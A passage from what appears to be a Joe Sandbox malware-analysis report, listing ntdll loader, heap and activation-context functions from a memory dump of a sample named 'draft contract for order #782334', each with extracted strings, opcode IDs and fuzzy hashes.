                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                        • API String ID: 0-1700792311
                                                                                                                        • Opcode ID: e15ec20bfd35f2920d3650d6a70c8d0f32b10ab5646873f84571b37331e155dc
                                                                                                                        • Instruction ID: 7e04ff430cef11b732bb2b15b4958960228f05f1bc2bd387d5d7b254a834aaf2
                                                                                                                        • Opcode Fuzzy Hash: e15ec20bfd35f2920d3650d6a70c8d0f32b10ab5646873f84571b37331e155dc
                                                                                                                        • Instruction Fuzzy Hash: 23D1B9315002869FDB26DF68C884BEAFBF2FF4A714F18805DF5469B652C7349981CB14
                                                                                                                        Function 017889B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • AVRF: -*- final list of providers -*- , xrefs: 01788B8F
                                                                                                                        • VerifierFlags, xrefs: 01788C50
                                                                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01788A3D
                                                                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01788A67
                                                                                                                        • VerifierDlls, xrefs: 01788CBD
                                                                                                                        • HandleTraces, xrefs: 01788C8F
                                                                                                                        • VerifierDebug, xrefs: 01788CA5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                        • API String ID: 0-3223716464
                                                                                                                        • Opcode ID: 228fc5ddb4bd6442262a1077aaf538cce891e9d399e41bf60023f7ebb9e8d3c5
                                                                                                                        • Instruction ID: cb3dab52c9f20cdacb0db1ddd68e11680c3189a800acc9789b8b49869e5febf7
                                                                                                                        • Opcode Fuzzy Hash: 228fc5ddb4bd6442262a1077aaf538cce891e9d399e41bf60023f7ebb9e8d3c5
                                                                                                                        • Instruction Fuzzy Hash: EE9136B16897129FD321FF28C884F1BFBE4AB94724F85455CFA41AB285C7709D01C796
                                                                                                                        Function 0170EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                        • API String ID: 0-1109411897
                                                                                                                        • Opcode ID: 407535bfead1f840bb063eee2a3f2ae19900fc49772ffe0ce667709b860a9686
                                                                                                                        • Instruction ID: 54113bae73ddb294263b99d80244042e8f0598cbe194577464e900e6c313697e
                                                                                                                        • Opcode Fuzzy Hash: 407535bfead1f840bb063eee2a3f2ae19900fc49772ffe0ce667709b860a9686
                                                                                                                        • Instruction Fuzzy Hash: FFA22774A0562ACFDB75DF19CD887A9FBB5AF49304F1442E9D90AA7290DB309E85CF00
                                                                                                                        Function 017363FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-792281065
                                                                                                                        • Opcode ID: f6ee2a1d4a42d03a2fcf369b424b615f164fbc2eed7de47ad9de400e7343095a
                                                                                                                        • Instruction ID: 736b083a5ce269a9998410f8a5347a01e2d37441841b1695b784351fed6cd8a5
                                                                                                                        • Opcode Fuzzy Hash: f6ee2a1d4a42d03a2fcf369b424b615f164fbc2eed7de47ad9de400e7343095a
                                                                                                                        • Instruction Fuzzy Hash: 19914A70F41315ABDF35EF58DC88BAAFBA1BB40724F10416CF9126B286D7709A41C791
                                                                                                                        Function 016F645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01759A2A
                                                                                                                        • apphelp.dll, xrefs: 016F6496
                                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01759A01
                                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017599ED
                                                                                                                        • LdrpInitShimEngine, xrefs: 017599F4, 01759A07, 01759A30
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01759A11, 01759A3A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-204845295
                                                                                                                        • Opcode ID: 3e34686ed38b140041c13879e59595e2657c9626033efe229cffb361daafaf5e
                                                                                                                        • Instruction ID: 6ac2428d054769c7e05b1aa004293e299b1acab030aaf61c5ba5cb9ed4d9a22b
                                                                                                                        • Opcode Fuzzy Hash: 3e34686ed38b140041c13879e59595e2657c9626033efe229cffb361daafaf5e
                                                                                                                        • Instruction Fuzzy Hash: 0351C371248305DFE724DF24CC95BABB7E9FB84658F00491DFA869B154DB70EA04CBA2
                                                                                                                        Function 01732674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01772160, 0177219A, 017721BA
                                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0177219F
                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01772178
                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01772165
                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017721BF
                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01772180
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                        • API String ID: 0-861424205
                                                                                                                        • Opcode ID: 8a4203400e78c74c71da4ef0fabbaca2ff8da2fdf748a9d28f403b1eaafaa38d
                                                                                                                        • Instruction ID: b72f5d8edd7a7f7e3e7b27ebfd643e21012ce80daeef5096d14d9ec7115d4e9b
                                                                                                                        • Opcode Fuzzy Hash: 8a4203400e78c74c71da4ef0fabbaca2ff8da2fdf748a9d28f403b1eaafaa38d
                                                                                                                        • Instruction Fuzzy Hash: 34313736F4121577EB229A999C45F5BFBB8FBA5A90F0501A9FB0567243D2709E00C3E0
                                                                                                                        Function 0173C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01778181, 017781F5
                                                                                                                        • LdrpInitializeProcess, xrefs: 0173C6C4
                                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01778177, 017781EB
                                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 017781E5
                                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01778170
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0173C6C3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                        • API String ID: 0-475462383
                                                                                                                        • Opcode ID: 39c56943bd9af926b76ad5a2df6b911dee2a86848bd64a0aa5b24f03432f57cf
                                                                                                                        • Instruction ID: d34d51b1804a8d7d818d09b70db97988a31b7bebf4e1f2aa3d453d5b709494bd
                                                                                                                        • Opcode Fuzzy Hash: 39c56943bd9af926b76ad5a2df6b911dee2a86848bd64a0aa5b24f03432f57cf
                                                                                                                        • Instruction Fuzzy Hash: 4731E4726443469BC324EB28DC4DE2BF7E4EF94B24F05055CF945AB395DA20ED05C7A2
                                                                                                                        Function 0174096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 01742DF0: LdrInitializeThunk.NTDLL ref: 01742DFA
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740BA3
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740BB6
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740D60
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740D74
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1404860816-0
                                                                                                                        • Opcode ID: 5307686c404a30be05d50d1c936f06ef97955f2cb4a0698137fdf4b3bfa2a60e
                                                                                                                        • Instruction ID: 92f90164c844c62b1840711b8f71fc93d0f70a1d7fc1bd192ee9215195e466b9
                                                                                                                        • Opcode Fuzzy Hash: 5307686c404a30be05d50d1c936f06ef97955f2cb4a0698137fdf4b3bfa2a60e
                                                                                                                        • Instruction Fuzzy Hash: 7F425A71900715DFDB21CF28C884BEAB7F5BF48314F1445A9EA89EB245E770AA84CF61
                                                                                                                        Function 0170A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                        • API String ID: 0-379654539
                                                                                                                        • Opcode ID: 120a50b9a32dfd26fa3a158482183f6860982e993acb28e927f0ada19649ee4a
                                                                                                                        • Instruction ID: 6b5fab2b05822e66bc1593e080ac49b4c5c06391cdab119b52a5d74b908c21b5
                                                                                                                        • Opcode Fuzzy Hash: 120a50b9a32dfd26fa3a158482183f6860982e993acb28e927f0ada19649ee4a
                                                                                                                        • Instruction Fuzzy Hash: 7CC17A74108382CFD712CF68C444B6AF7E4FF94704F0489AAF9968B296E735CA49CB52
                                                                                                                        Function 01738402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0173855E
                                                                                                                        • LdrpInitializeProcess, xrefs: 01738422
                                                                                                                        • @, xrefs: 01738591
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01738421
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-1918872054
                                                                                                                        • Opcode ID: f866d75f6c3d371606593d3c0ff3a879b99b1d1fa19b36345a053e89a3265c53
                                                                                                                        • Instruction ID: 2c02da9cc79767f5c5097165c3a35a72ed50912344d0495560c96f4a54772ddc
                                                                                                                        • Opcode Fuzzy Hash: f866d75f6c3d371606593d3c0ff3a879b99b1d1fa19b36345a053e89a3265c53
                                                                                                                        • Instruction Fuzzy Hash: 09918A71548345AFDB22DF65CC44FABFBE8BB88654F400A2EFA8496146E334D904CB63
                                                                                                                        Function 0173273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 017721DE
                                                                                                                        • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017721D9, 017722B1
                                                                                                                        • .Local, xrefs: 017328D8
                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017722B6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                        • API String ID: 0-1239276146
                                                                                                                        • Opcode ID: 8a36f8bbe93cc6bbe5bbca031ca7ae6ac4b2bf923b5fd00bc6426a06bca13a70
                                                                                                                        • Instruction ID: 6d92cf1c06219d69ddeb507bc62e3a9a9fdb3f0e1a32fd5fcbd1f5812668fb04
                                                                                                                        • Opcode Fuzzy Hash: 8a36f8bbe93cc6bbe5bbca031ca7ae6ac4b2bf923b5fd00bc6426a06bca13a70
                                                                                                                        • Instruction Fuzzy Hash: 75A1BD31A05229DBDB24CF68CC88BA9F7B0BF98314F1541E9D918AB252D7309E80CF90
                                                                                                                        Function 01734AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01773456
                                                                                                                        • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01773437
                                                                                                                        • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0177342A
                                                                                                                        • RtlDeactivateActivationContext, xrefs: 01773425, 01773432, 01773451
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                        • API String ID: 0-1245972979
                                                                                                                        • Opcode ID: a6dfed9cbc394b856c5915c2ec9b1b2a276a0f962c794ff060381ae292f55e30
                                                                                                                        • Instruction ID: fad418318665089b0e383073739837fba6b58751ccf00b601d2caecd4ee660db
                                                                                                                        • Opcode Fuzzy Hash: a6dfed9cbc394b856c5915c2ec9b1b2a276a0f962c794ff060381ae292f55e30
                                                                                                                        • Instruction Fuzzy Hash: D76123766407129BDB2ACF1DC845B3AF7E1FF80B60F14856DE9569B282DB30E801CB95
                                                                                                                        Function 017064AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01760FE5
                                                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01761028
                                                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0176106B
                                                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017610AE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                        • API String ID: 0-1468400865
                                                                                                                        • Opcode ID: f7c3bf0933a1772235ef549b832d859467322709ae75b73695e138704b32707f
                                                                                                                        • Instruction ID: 6968669dacd9d60fa361340d90a666c3680b1b7529734d37f0a93f55aac33b42
                                                                                                                        • Opcode Fuzzy Hash: f7c3bf0933a1772235ef549b832d859467322709ae75b73695e138704b32707f
                                                                                                                        • Instruction Fuzzy Hash: 6971C0B19043459FCB22DF14C888B9BBFE8AF54764F500468FD498B28AD375D588CBD2
                                                                                                                        Function 0172245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • apphelp.dll, xrefs: 01722462
                                                                                                                        • LdrpDynamicShimModule, xrefs: 0176A998
                                                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0176A992
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0176A9A2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-176724104
                                                                                                                        • Opcode ID: 66e371b73349121e02148b39c992a828c0272d68a5a72f2ac7419fd95d0e2740
                                                                                                                        • Instruction ID: b4e4a11fbc125b6cfd04a41dd5bea63d72fa0e0e5cc8e7937ab9bc6e198517d2
                                                                                                                        • Opcode Fuzzy Hash: 66e371b73349121e02148b39c992a828c0272d68a5a72f2ac7419fd95d0e2740
                                                                                                                        • Instruction Fuzzy Hash: B4310575640301ABDB319F5DD885A6BF7B9FB84B20F25405EF91177249CB709982CB90
                                                                                                                        Function 017129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • HEAP[%wZ]: , xrefs: 01713255
                                                                                                                        • HEAP: , xrefs: 01713264
                                                                                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0171327D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                        • API String ID: 0-617086771
                                                                                                                        • Opcode ID: c9a9fb3a9fa45e1c13dfcd13244e4e154aa5e753562436c331bff6015dd6ef9f
                                                                                                                        • Instruction ID: 6d15e9f23fcc7b985024aaa513b4c227498258b84d4e6e7ae930f0453a6790f4
                                                                                                                        • Opcode Fuzzy Hash: c9a9fb3a9fa45e1c13dfcd13244e4e154aa5e753562436c331bff6015dd6ef9f
                                                                                                                        • Instruction Fuzzy Hash: E892BB71A042499FDB25CF6CC444BAEFBF1FF48310F288499E859AB39AD334A945CB50
                                                                                                                        Function 01710770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                        • API String ID: 0-4253913091
                                                                                                                        • Opcode ID: 977ddf29e7b6bd16ce7b0394decb55462b632cf73f4ed25f2b21f76499286c7f
                                                                                                                        • Instruction ID: b50fad2288d3af9a540c298a0212bf1f4102bbdf4e293c32a01ac97355dab7d4
                                                                                                                        • Opcode Fuzzy Hash: 977ddf29e7b6bd16ce7b0394decb55462b632cf73f4ed25f2b21f76499286c7f
                                                                                                                        • Instruction Fuzzy Hash: 9AF19B70604606DFEB25CF6CC894B6AF7B6FF44704F1481A9E9169B389D734EA81CB90
                                                                                                                        Function 01726962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $@
                                                                                                                        • API String ID: 0-1077428164
                                                                                                                        • Opcode ID: c1f4cbb4e4d195c2c1b394243ab905043df893906e2c3970be7f7a8c59409cc5
                                                                                                                        • Instruction ID: 18224537fed7c46732b82fd76809850e9442ee00d9b23d783f49fb08d1611212
                                                                                                                        • Opcode Fuzzy Hash: c1f4cbb4e4d195c2c1b394243ab905043df893906e2c3970be7f7a8c59409cc5
                                                                                                                        • Instruction Fuzzy Hash: 1DC29E716083519FDB2ACF28C981BABFBE5AF98714F04892DF9C987241D734D846CB52
                                                                                                                        Function 016FA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                        • API String ID: 0-2779062949
                                                                                                                        • Opcode ID: 83cf4a90498c77f09366b57aee52c3ffe51c8b362772de9f94df64235d53f489
                                                                                                                        • Instruction ID: 405f9a3eed8a2e6fd5ce2ad515a70e1575a7b7ed6d1beeac8ded358e18aa1874
                                                                                                                        • Opcode Fuzzy Hash: 83cf4a90498c77f09366b57aee52c3ffe51c8b362772de9f94df64235d53f489
                                                                                                                        • Instruction Fuzzy Hash: F1A19F759116299BDB32DF68CC88BAAFBB8EF44700F1041E9EA08A7251D7759EC4CF50
                                                                                                                        Function 01720BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0176A10F
                                                                                                                        • LdrpCheckModule, xrefs: 0176A117
                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0176A121
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                        • API String ID: 0-161242083
                                                                                                                        • Opcode ID: ca9be104a1bcefe14447a1ab21aa4b9e08af9c30c1a248ddd4027b80f3b903ae
                                                                                                                        • Instruction ID: 9ce375115e4361e83c347f7ff01ed60a140901598121c42f60c15f9a00ed0b4f
                                                                                                                        • Opcode Fuzzy Hash: ca9be104a1bcefe14447a1ab21aa4b9e08af9c30c1a248ddd4027b80f3b903ae
                                                                                                                        • Instruction Fuzzy Hash: 0071C1B0A00205DFDB29DF68C984ABEF7F4FB44714F14846DE912AB255E734A982CB60
                                                                                                                        Function 01710A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2090450873.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_16d0000_draft contract for order #782334.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                        • API String ID: 0-1334570610
                                                                                                                        • Opcode ID: 7a44c140c55205d748e4e3868accf6c38bc6351f16731d51fcdc44af2a52a1e1
                                                                                                                        • Instruction ID: 6e9cb89640ca07e9a50ae8106ebdfcef3ee193483f27b9315d50c813d854c0bb
                                                                                                                        • Opcode Fuzzy Hash: 7a44c140c55205d748e4e3868accf6c38bc6351f16731d51fcdc44af2a52a1e1
